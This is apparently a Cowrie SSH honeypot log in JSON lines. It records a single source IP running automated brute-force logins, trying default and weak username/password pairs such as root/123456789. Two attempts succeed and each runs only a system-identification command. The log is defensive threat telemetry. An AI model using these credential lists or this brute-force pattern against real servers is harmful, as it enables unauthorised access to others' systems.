{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:00.057635Z","src_ip":"212.227.125.160","session":"d6fcced5a72d"}
{"eventid":"cowrie.login.failed","username":"jiffyapp-usr","password":"jiffyapp-usr","message":"login attempt [jiffyapp-usr/jiffyapp-usr] failed","sensor":"my-vps","timestamp":"2025-08-26T21:35:00.380302Z","src_ip":"212.227.125.160","session":"d6fcced5a72d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:01.433452Z","src_ip":"212.227.125.160","session":"d6fcced5a72d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32826,"dst_ip":"1.2.3.4","dst_port":22,"session":"03300ae39f07","protocol":"ssh","message":"New connection: 212.227.125.160:32826 (1.2.3.4:22) [session: 03300ae39f07]","sensor":"my-vps","timestamp":"2025-08-26T21:35:05.324644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:05.325636Z","src_ip":"212.227.125.160","session":"03300ae39f07"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:05.376113Z","src_ip":"212.227.125.160","session":"03300ae39f07"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"123456","message":"login attempt [ec2-user/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:35:05.511693Z","src_ip":"212.227.125.160","session":"03300ae39f07"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:06.759421Z","src_ip":"212.227.125.160","session":"03300ae39f07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56450,"dst_ip":"1.2.3.4","dst_port":22,"session":"828668e0bfbe","protocol":"ssh","message":"New connection: 212.227.125.160:56450 (1.2.3.4:22) [session: 828668e0bfbe]","sensor":"my-vps","timestamp":"2025-08-26T21:35:10.955757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:10.967496Z","src_ip":"212.227.125.160","session":"828668e0bfbe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:11.030820Z","src_ip":"212.227.125.160","session":"828668e0bfbe"}
{"eventid":"cowrie.login.failed","username":"omsagent","password":"omsagent","message":"login attempt [omsagent/omsagent] failed","sensor":"my-vps","timestamp":"2025-08-26T21:35:11.268726Z","src_ip":"212.227.125.160","session":"828668e0bfbe"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:12.428789Z","src_ip":"212.227.125.160","session":"828668e0bfbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51836,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bb6f6870a69","protocol":"ssh","message":"New connection: 212.227.125.160:51836 (1.2.3.4:22) [session: 4bb6f6870a69]","sensor":"my-vps","timestamp":"2025-08-26T21:35:16.518811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:16.519561Z","src_ip":"212.227.125.160","session":"4bb6f6870a69"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:16.575952Z","src_ip":"212.227.125.160","session":"4bb6f6870a69"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:35:16.713504Z","src_ip":"212.227.125.160","session":"4bb6f6870a69"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:35:16.818556Z","src_ip":"212.227.125.160","session":"4bb6f6870a69"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:35:16.819343Z","src_ip":"212.227.125.160","session":"4bb6f6870a69"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:16.865167Z","src_ip":"212.227.125.160","session":"4bb6f6870a69"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:16.866394Z","src_ip":"212.227.125.160","session":"4bb6f6870a69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47222,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f34abe81f57","protocol":"ssh","message":"New connection: 212.227.125.160:47222 (1.2.3.4:22) [session: 6f34abe81f57]","sensor":"my-vps","timestamp":"2025-08-26T21:35:22.268376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:22.270813Z","src_ip":"212.227.125.160","session":"6f34abe81f57"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:22.315747Z","src_ip":"212.227.125.160","session":"6f34abe81f57"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-26T21:35:22.764755Z","src_ip":"212.227.125.160","session":"6f34abe81f57"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:23.906938Z","src_ip":"212.227.125.160","session":"6f34abe81f57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42606,"dst_ip":"1.2.3.4","dst_port":22,"session":"48932c6fed46","protocol":"ssh","message":"New connection: 212.227.125.160:42606 (1.2.3.4:22) [session: 48932c6fed46]","sensor":"my-vps","timestamp":"2025-08-26T21:35:28.046703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:28.049154Z","src_ip":"212.227.125.160","session":"48932c6fed46"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:28.134314Z","src_ip":"212.227.125.160","session":"48932c6fed46"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:35:28.398832Z","src_ip":"212.227.125.160","session":"48932c6fed46"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:35:28.633646Z","src_ip":"212.227.125.160","session":"48932c6fed46"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:35:28.634331Z","src_ip":"212.227.125.160","session":"48932c6fed46"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:28.694349Z","src_ip":"212.227.125.160","session":"48932c6fed46"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:28.695499Z","src_ip":"212.227.125.160","session":"48932c6fed46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37994,"dst_ip":"1.2.3.4","dst_port":22,"session":"72fe51d582e2","protocol":"ssh","message":"New connection: 212.227.125.160:37994 (1.2.3.4:22) [session: 72fe51d582e2]","sensor":"my-vps","timestamp":"2025-08-26T21:35:33.535084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:33.543106Z","src_ip":"212.227.125.160","session":"72fe51d582e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:33.586194Z","src_ip":"212.227.125.160","session":"72fe51d582e2"}
{"eventid":"cowrie.login.failed","username":"runner","password":"runner","message":"login attempt [runner/runner] failed","sensor":"my-vps","timestamp":"2025-08-26T21:35:33.785474Z","src_ip":"212.227.125.160","session":"72fe51d582e2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:34.836822Z","src_ip":"212.227.125.160","session":"72fe51d582e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33380,"dst_ip":"1.2.3.4","dst_port":22,"session":"f101e8927765","protocol":"ssh","message":"New connection: 212.227.125.160:33380 (1.2.3.4:22) [session: f101e8927765]","sensor":"my-vps","timestamp":"2025-08-26T21:35:39.089985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:39.092042Z","src_ip":"212.227.125.160","session":"f101e8927765"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:39.140537Z","src_ip":"212.227.125.160","session":"f101e8927765"}
{"eventid":"cowrie.login.failed","username":"hapubws","password":"hapubws","message":"login attempt [hapubws/hapubws] failed","sensor":"my-vps","timestamp":"2025-08-26T21:35:39.339731Z","src_ip":"212.227.125.160","session":"f101e8927765"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:40.400048Z","src_ip":"212.227.125.160","session":"f101e8927765"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56998,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf5c5e191759","protocol":"ssh","message":"New connection: 212.227.125.160:56998 (1.2.3.4:22) [session: bf5c5e191759]","sensor":"my-vps","timestamp":"2025-08-26T21:35:44.616125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:44.617147Z","src_ip":"212.227.125.160","session":"bf5c5e191759"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:44.661028Z","src_ip":"212.227.125.160","session":"bf5c5e191759"}
{"eventid":"cowrie.login.failed","username":"update","password":"update","message":"login attempt [update/update] failed","sensor":"my-vps","timestamp":"2025-08-26T21:35:44.794442Z","src_ip":"212.227.125.160","session":"bf5c5e191759"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:45.845658Z","src_ip":"212.227.125.160","session":"bf5c5e191759"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52382,"dst_ip":"1.2.3.4","dst_port":22,"session":"566337133345","protocol":"ssh","message":"New connection: 212.227.125.160:52382 (1.2.3.4:22) [session: 566337133345]","sensor":"my-vps","timestamp":"2025-08-26T21:35:49.650410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:49.654519Z","src_ip":"212.227.125.160","session":"566337133345"}
